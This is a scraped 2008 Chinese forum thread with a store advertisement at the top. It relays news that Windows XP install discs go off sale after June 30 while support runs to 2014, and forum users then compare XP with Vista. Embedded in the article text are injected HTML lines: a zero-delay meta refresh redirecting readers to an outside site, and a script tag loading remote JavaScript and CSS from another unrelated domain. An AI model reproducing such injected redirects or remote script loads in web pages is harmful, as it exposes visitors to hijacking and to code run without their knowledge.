开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

微软也舍不得XP,宣称将沿用至2014年

随之六月底的来临,微软有两件大事让人注目,一是比尔盖茨将要退体,另一个就是前段时间讨论的比较热烈的Windows XP将会退出市场。据报道,6月30日之后将不能再买到Windows XP系统安装盘,但同时微软也向消费者宣布,该操作系统将可以一直沿用到2014年。
  据微软称,虽然过了六月就买不到安装盘,但如果您还是非常留恋Windows XP的话,您可以在购买预安装了Windows Vista的电脑上,要求PC商免费或者收费给您降级到Windows XP系统。并且微软将会为那些低成本,低配置的电脑如华硕的Eee PC等作为例外而延长使用XP。据国外媒体报道,事实上目前在一些地区人们接受[url=http://www.pconline.com.cn/pcedu/soft/st/WindowVista/index.html]Windows Vista[/url]的程度渐渐在下滑,因此微软似乎除了作出延长使用Windows XP,其他也别无可行的选择。<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

Windows XP的生命力很旺盛。
还是用XP方便啊..........
应该不发到评测区啊........
“人们接受Windows Vista的程度渐渐在下滑”
呵呵,微软就知道吃掉我们的系统资源
不是吧,有没有搞错……
我一直用xp,不喜欢vista,太华丽,太摄氏,不爽,
现在还有WIN95呢 盗版可以随心所欲
原帖由 jinj322 于 2008-6-29 14:17 发表
现在还有WIN95呢 盗版可以随心所欲
win95???? 这个估计米人用了
原帖由 IBMING 于 2008-6-29 12:27 发表
我一直用xp,不喜欢vista,太华丽,太摄氏,不爽,

我想当初你用98的时候也是这么说XP的吧?
原帖由 snowolfII 于 2008-6-29 14:19 发表

我想当初你用98的时候也是这么说XP的吧?
错,俺一直用xp,98的确用过,但是时间很短。。。。
我是从DOS-》win32-》win95-》win98-》winXP一路走来的,,,
其实严格的说不能有win32这一档,那是win32只是个应用工具,不是OS
说明VISTA的功能还没有强大到能取代XP
原帖由 xiaobagou 于 2008-6-27 12:17 发表
跟你我有关系嘛,用盗版的,管它到多久

有关系啊,m$停了xp,就没有安全更新了,然后杀毒、防火墙也会逐渐放弃。。。。。。

有些东西是必须持续更新的。
如果我喜欢,我可以用到20140年……改变消费者的习惯还是很困难的。
原帖由 mxs0406 于 2008-6-30 10:59 发表
如果我喜欢,我可以用到20140年……改变消费者的习惯还是很困难的。

请问火星人的平均寿命是?
另外,您老高寿?
原帖由 pkuchm 于 2008-6-30 11:04 发表

请问火星人的平均寿命是?
另外,您老高寿?
哦,不考虑我的寿命的前提下……
下下个笔记本估计还得用XP
如果vista  能解决  软件 兼容等等的问题 我就使用 哈哈啊
现在的兼容性已经很不错了
原帖由 kituq521 于 2008-6-30 13:25 发表
如果vista  能解决  软件 兼容等等的问题 我就使用 哈哈啊

试试SP1 吧……不会让你失望的……
原帖由 calvinchen 于 2008-6-30 14:11 发表

试试SP1 吧……不会让你失望的……

有了S1让你上了QQ。。。。。
原帖由 12345677 于 2008-6-30 14:25 发表

有了S1让你上了QQ。。。。。

是的 从此我成为了SP1 的坚定拥趸
XP还是好用